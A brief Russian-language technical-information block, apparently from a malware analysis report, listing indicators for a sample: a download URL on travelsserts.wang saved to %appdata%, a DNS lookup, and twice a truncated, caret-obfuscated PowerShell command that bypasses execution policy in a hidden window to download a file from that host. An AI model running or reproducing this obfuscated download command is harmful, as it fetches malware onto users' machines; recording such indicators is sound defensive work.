Техническая информация
- http://travelsserts.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^werSH^EL^l^.^EX^E^ -eX^E^c^uT^io^np^O^LIc^y B^y^p^ASS -nO^PR^OFiLE ^-WI^N^d^OWSt^ylE HiD^De^N (n^EW-o^B^J^eCT SySTe^M^.^nE^T.^WEBCLiE^Nt).^DoW^Nl^O^a^DFil^e('http://travelss...
- DNS ASK tr####sserts.wang
- '<SYSTEM32>\cmd.exe' /c "po^werSH^EL^l^.^EX^E^ -eX^E^c^uT^io^np^O^LIc^y B^y^p^ASS -nO^PR^OFiLE ^-WI^N^d^OWSt^ylE HiD^De^N (n^EW-o^B^J^eCT SySTe^M^.^nE^T.^WEBCLiE^Nt).^DoW^Nl^O^a^DFil^e('http://travelss...' (со скрытым окном)